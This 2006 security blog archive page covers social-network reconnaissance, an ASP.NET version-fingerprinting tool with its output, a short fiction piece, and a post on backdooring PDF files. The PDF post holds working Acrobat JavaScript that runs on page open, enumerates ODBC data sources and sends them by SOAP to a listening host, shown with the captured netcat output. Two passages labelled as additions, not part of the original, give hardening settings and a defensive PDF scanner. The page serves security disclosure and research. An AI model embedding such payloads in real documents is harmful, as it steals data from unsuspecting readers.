Archive for September, 2006

Social Networks the New Fingerd

Ring, ring…

“Hello?”
“Hi, I’m looking for Michael Daw?”
“Speaking, how may I help you?”
“Hi Michael, my name is Ian Lambert. I am a member of Pittman’s Recruitment. We specialise in security recruiting. We have a common acquaintance, Peter Smith?”

“Isn’t it true, it’s not what you know but who you know,” I thought to myself as I put the phone down.

A spark went off in my head as I pondered over my conversation with Ian. How much information is available on social networks? My next question dismissed the first, “Why would I care?” I sat back in my comfortable lazy boy chair and let out a big sigh.

The old Unix finger daemon popped into my head. This service, running on 79/TCP, allowed remote users to query a server for logged-in users. Back in the day attackers loved this service: it meant they could remotely enumerate valid usernames. I logged into my Unix server to remind myself of the information disclosed via this service:

$ finger
Login     Name       	Tty      Idle  Login Time   Office     Office Phone
root      superman   	pts/0          Sep 11 18:11 (10.10.1.5)
michael  Michael Daw	pts/1          Sep 11 22:19 (10.10.1.90)

$ finger michael
Login: michael                              Name: Michael Daw
Directory: /home/michael                   Shell: /bin/bash
On since Sun Sep 11 18:11 (BST) on pts/0 from 10.10.1.90
   2 minutes 25 seconds idle
On since Sun Sep 11 22:19 (BST) on pts/1 from 10.10.1.90
New mail received Sun Sep 11 22:20 2006 (BST)
     Unread since Fri Aug 25 22:13 2006 (BST)
No Plan.

I then logged into LinkedIn.com, an Internet social network service used mostly for business connections. It has over 2.5 million registered users, including 630,000 in Europe and 170,000 in Asia. Social networks were appearing everywhere, including sites such as www.facebook.com, www.myspace.com, www.classmates.com, www.sixdegrees.com and www.friendster.com, to name a few.

A grin crossed my face as my eyes fell upon the “Search by company” option. I clicked my fingers and entered Google (my favourite prey):

We found 17 users in your network matching your criteria:

    * Users currently at: google
    * Sorted by: keyword relevance

Who needs Finger, I chuckled.

This was one technique that could be used in Targeted XSS Attacks using only HTTP (Hackers Totally Trusted Protocol).

References:
http://en.wikipedia.org/wiki/LinkedIn

Log 0.8 - The Nightmare

It felt as if any minute, my heart would come tearing through my chest. I had stopped just outside the building to catch my breath.

As I looked out into the night I noticed something frightfully peculiar. At that moment my head felt as if it was in a James Bond cocktail.

“Nothing, absolutely nothing” I whispered.

The lights from the building had lit up the night air, creating a two or three metre perimeter, and then nothing! Not a light, not a sound, nothing! My greatest fear had always been the nothingness of space. It reminded me of a black hole.

I had imagined being sucked into a black hole as a boy. I had often pondered over space singularities. If anyone could ever survive the gravitational forces of such a monster, would he be trapped in a place where time and the emptiness of space were infinite, unable to escape the grasp of such a thing?

“Walking into the pitch black night is not my idea of a night out,” I said trying to cheer myself up in what seemed a dire situation.

After a few metres the tips of my fingers connected with a wall-like structure.

I began to panic; I felt like a trapped gecko.

Above me were stars. Their glow gave me some comfort and lit a black-framed wall which lay in front of me. I jumped in desperation, attempting to scale the wall. After a few minutes of jumping my fingers and hands were feeling raw.

“Michael, where are you?” I could see Cole standing by the door. I quietly and carefully bent down until hunched, and then lay down gently so that my stomach was touching the floor.

“Michael, I know this has been a crazy night for you, but it’s going to be alright. If I was going to do something, I would have done it already. Come out so we can talk. I promise nothing will happen to you; you mean too much to me and this institution.”

ASP Auditor v2 BETA

ASP auditor v2 BETA
Author david.kierznowski_at_gmail.com
http://michaeldaw.org

purpose: Look for common misconfigurations and information leaks in
ASP.NET applications.

# Changelog:
# --v2.2-- 20/Apr/07
# * Added additional support for Anti-XSS Validation detection.
# * Added ASP Source Directory Leak Check
# * Added Apr/07 ASP.NET Validation Bypass Check
#
# --v2.1-- 25/Sep/06
# * GET /Trace.axd often leaks ASP.NET version when other methods fail.
# * Fixed “?” bug in JavaScript Validate test
# * Added Version into usage()
#
# --v2.0-- 16/Sep/06
# * Version plugin allowing specific ASP.NET versioning.
# * Version brute force capabilities using JavaScript validate
# directories.
# * Check if global ASP.NET validate is being used.
# * Added brute force function and option in usage()

This tool is based on H D Moore’s Dot Net Application Scanner
Author: H D Moore <hdm_at_digitaloffense.net>
URL: http://www.digitaloffense.net/index.html?section=TOOLS

Credits:
HDM thanks for the feedback.

--usage
$ ./asp-audit-latest.pl

Usage:   ./asp-audit-latest.pl [http://target/app/file.aspx] (opts)

        (opts)
            -bf brute force ASP.NET version using JS Validate
            directories.

--example 1
$ ./asp-audit.pl http://www.*hidden*/index.aspx
[*] Sending initial probe request…
[*] Sending path discovery request…
[*] Sending ASP.NET validate discovery request…
[*] Sending application trace request…
[*] Sending null remoter service request…

[ .NET Configuration Analysis ]

  Server   -> Microsoft-IIS/6.0
  Application   -> /
  FilePath   -> D:\VirtualServers\*hidden*
  ADNVersion   -> 1.1.4322.2300

  matches -> 1.1.4322.2300 Version 1.1 Post-SP1 (Windows Server 2003 SP1)  Mar 2005

--example 2
$ ./asp-audit.pl http://www.*hidden*/index.aspx -bf
[*] Sending initial probe request…
[*] Sending path discovery request…
[*] Sending ASP.NET validate discovery request…
[*] Sending application trace request…
[*] Sending null remoter service request…

[ .NET Configuration Analysis ]

    Server  -> Microsoft-IIS/6.0
    AppTrace  -> LocalOnly
    Application  -> /
    FilePath  -> D:\inetpub\*hidden*
    ADNVersion  -> 1.1.4322.2300

    matches -> 1.1.4322.2300 Version 1.1 Post-SP1 (Windows Server 2003 SP1)  Mar 2005

[*] Sending brute force discovery requests…
        Found -> /aspnet_client/system_web/1_1_4322
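As an added illustration (not part of the tool or the original post), the web.config settings behind several of the checks above, with the weak configuration beside the hardened one. The elements and attributes are the standard ASP.NET system.web settings; the error page path is a placeholder.

```xml
<!-- Weak: the configuration that the checks above light up on -->
<configuration>
  <system.web>
    <!-- /Trace.axd answers remote requests and lists requests, headers and the framework version -->
    <trace enabled="true" localOnly="false" />
    <!-- Default ASP.NET error pages: stack traces and the version banner go to the client -->
    <customErrors mode="Off" />
    <!-- Global request validation switched off -->
    <pages validateRequest="false" />
    <compilation debug="true" />
  </system.web>
</configuration>

<!-- Hardened: the same settings as a production server should carry them -->
<configuration>
  <system.web>
    <!-- Trace off entirely; if it must stay on for diagnosis, at least keep it local -->
    <trace enabled="false" localOnly="true" />
    <!-- placeholder page: replace with the application's own error page -->
    <customErrors mode="On" defaultRedirect="~/error.aspx" />
    <pages validateRequest="true" />
    <compilation debug="false" />
    <!-- ASP.NET 2.0 and later: stop emitting the X-AspNet-Version response header -->
    <httpRuntime enableVersionHeader="false" />
  </system.web>
</configuration>
```

The aspnet_client/system_web/<version> directory that the -bf option enumerates is a physical folder the framework installer creates under the web root, so it is removed or access-restricted in IIS rather than in web.config.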

The tool can be downloaded here:
http://michaeldaw.org/projects/asp-audit-latest.tar.gz

Backdooring PDF Files


Updates:

Recently there has been a lot of hype involving backdooring various web technologies. pdp (architect) has done a lot of work centred around this area.

I saw Jeremiah Grossman mention PDFs being “BAD”; however, I was unable to easily locate any practical reasons why. I decided to investigate this a little further.

At first glance PDF documents seem obviously vulnerable, because the format supports JavaScript. However, there are quite a few twists and turns; it is by no means as straightforward as this.

Adobe supports its own JavaScript object model. For example, alert('xss') must be called from the app object, so this becomes app.alert('xss'). This means JavaScript attacks are limited to the functionality supported within Adobe. Secondly, Adobe Reader and Adobe Professional (the two apps I focus on in this article) are very different with regards to which JavaScript objects are allowed.

This article will give two practical examples of how Adobe Professional and Adobe Reader can be backdoored. There are 7 or more points where an attacker can launch malicious code. Both of the attacks discussed below are attached to the “Page Open” event.

The trigger can be accessed via “Page Properties | Actions tab”.

The first attack is simple and affects both Adobe Reader and Adobe Professional. It involves adding a malicious link into the PDF document. Once the document is opened, the user’s browser is automatically launched and the link is accessed. At this point it is obvious that any malicious code can be launched. It is interesting to note that neither Adobe 6 nor Adobe 7 warned me before launching these URLs.

The second attack involves utilising Adobe’s ADBC (Adobe Database Connectivity) and Web Services support. The following proof of concept code accesses the Windows ODBC, enumerates available databases and then sends this information to “localhost” via the web service.

var cURL = "http://localhost/";
var cTestString = "";

// Enumerate the ODBC data sources registered on the machine.
var databaseList = ADBC.getDataSourceList();

var DB = "";
if (databaseList != null) {
  for (var i = 0; i < databaseList.length; i++)
    DB += databaseList[i].name;
}

cTestString = DB;

// Send the collected data source names to cURL as a SOAP echoString request.
var response = SOAP.request({
  cURL: cURL,
  oRequest: {
    "http://myxmlns/:echoString": {
      inputString: cTestString
    }
  },
  cAction: "http://additional-opt/"
});

var result = response["http://no-need/:echoStringResponse"]["return"];

On the server side we get this:
$ ./nc.exe -l -p 80 -v
listening on [any] 80 …
connect to [127.0.0.1] from localhost [127.0.0.1] 1924
POST / HTTP/1.1
Accept: */*
Content-Type: text/xml; charset=UTF-8
SOAPAction: "http://additional-opt/"
Content-Length: 578
User-Agent: Mozilla/3.0 (compatible; Acrobat SOAP 7.0)
Host: localhost
Connection: Keep-Alive
Cache-Control: no-cache

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xm
lns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w
3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOA
P-ENV:Body><ns0:echoString SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/so
ap/encoding/" xmlns:ns0="http://myxmlns/"><inputString xsi:type="xsd:string">MS
Access 97 DatabaseFoxPro FilesText FilesMS Access DatabaseExcel FilesdBASE Files
dbase1</inputString>
</ns0:echoString>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

I am sure that with a bit more creativity even simpler and/or more advanced attacks could be put together. Adobe Acrobat supports “HTML forms”, “File system access”, and the list goes on.
Another interesting find was that you can backdoor all Adobe Acrobat files by loading a backdoored JavaScript file into your %ADOBE-VERSION-DIR%\Acrobat\Javascripts directory.

Proof of concept for example 1 can be found here.
Proof of concept for example 2 can be found here.
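As an added defender-side example (not from the original post), a byte-level triage scan over a constructed PDF that carries the kind of Page Open JavaScript and URI actions described above. It flags the action keys and the ADBC/SOAP calls, and warns when compressed objects would hide content from a raw scan.

```python
import re

# Constructed sample (not a real document): a minimal uncompressed PDF with no
# xref table, whose single page carries a Page Open action (/AA /O) running
# JavaScript in the style of the PoC above, plus a Link annotation with a /URI.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /AA << /O 4 0 R >> /Annots [5 0 R] >> endobj
4 0 obj << /S /JavaScript /JS (var l = ADBC.getDataSourceList(); SOAP.request({cURL: "http://localhost/"});) >> endobj
5 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://localhost/track) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Indicator pattern -> what it means to a reviewer.
INDICATORS = {
    rb"/OpenAction": "document-open action",
    rb"/AA\b": "additional actions (e.g. /O = page open)",
    rb"/JavaScript|/JS\b": "embedded JavaScript",
    rb"/URI\b": "URI action (may launch the browser)",
    rb"/Launch": "launch action",
    rb"\bADBC\.": "ADBC database access from JavaScript",
    rb"\bSOAP\.request": "SOAP/web-service call from JavaScript",
}

def scan_pdf(data: bytes) -> dict:
    """Count occurrences of each indicator in the raw PDF bytes."""
    return {name: len(re.findall(pat, data)) for pat, name in INDICATORS.items()}

def has_compressed_objects(data: bytes) -> bool:
    """Flate streams and object streams hide their content from a raw byte scan."""
    return b"/FlateDecode" in data or b"/ObjStm" in data

def risk_summary(data: bytes) -> list:
    """Names of indicators present, plus a caveat when compressed objects exist."""
    found = [name for name, count in scan_pdf(data).items() if count]
    if has_compressed_objects(data):
        found.append("compressed objects present: decode streams before trusting this scan")
    return found

if __name__ == "__main__":
    for line in risk_summary(SAMPLE_PDF):
        print(line)
```

A document that only shows the compression caveat still needs its streams inflated (a PDF library or qpdf) before the same scan says anything useful.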

ASP Auditor v1.0 BETA

ASP Auditor v1.0 BETA
Author: David Kierznowski (david.kierznowski_at_gmail.com)
http://michaeldaw.org/projects/

PLEASE NOTE THIS V1.0 IS DEPRECATED.
Please see the following link for the latest information regarding this tool: http://michaeldaw.org/projects/asp-auditor-v2/

The purpose of ASP Auditor is to identify vulnerable and weakly configured ASP.NET servers.

Usage:
$ ./asp-audit.pl
ASP Audit v1.0 (BETA) [ david.kierznowski@gmail.com ]
        Usage:   ./asp-audit.pl (opts) [host] [port]

        (opts)
            -h these usage instructions
            -b brute force ASP.NET version using JS Validate
            directories.
            -m match against fingerprints
            -v verbose messaging

Some examples can be seen below:

$ ./asp-audit.pl labs.microsoft.com
Target: labs.microsoft.com
Server Software: Microsoft-IIS/6.0
ASP Framework: YES
ASP Simple Version: 2.0.50727
ASP Specific Version: Unknown
ASP verbose messages: No
ASP Validate: No
Default Error Messages: No

$ ./asp-audit.pl -m labs.microsoft.com
Target: labs.microsoft.com
Server Software: Microsoft-IIS/6.0
ASP Framework: YES
ASP Simple Version: 2.0.50727
ASP Specific Version: Unknown
ASP verbose messages: No
ASP Validate: No
Default Error Messages: No

Fingerprint matches:
2.0.50727.07    Version 2.0 (Visual Studio.NET 2005 CTP)        Aug 2005
2.0.50727.26    Version 2.0 (Visual Studio.NET 2005 RC / SQL Server 2005 CTP)  Sep 2005
2.0.50727.42    Version 2.0 RTM (Visual Studio.NET 2005 RTM / SQL Server 2005 RTM)      Nov 2005

$ ./asp-audit.pl *hidden*
Target: *hidden*
Server Software: Microsoft-IIS/6.0
ASP Framework: YES
ASP Simple Version: Unknown
ASP Specific Version: Unknown
ASP verbose messages: No
ASP Validate: No
Default Error Messages: YES

$ ./asp-audit.pl -b *hidden*
Target: *hidden*
Server Software: Microsoft-IIS/6.0
ASP Framework: YES
ASP Simple Version: Unknown
ASP Specific Version: Unknown
ASP verbose messages: No
ASP Validate: No
Default Error Messages: YES

Found: aspnet_client/system_web/1_1_4322
Found: aspnet_client/system_web/2_0_50727

The tool can be downloaded here:
http://michaeldaw.org/projects/asp-audit-v1BETA.tar.gz
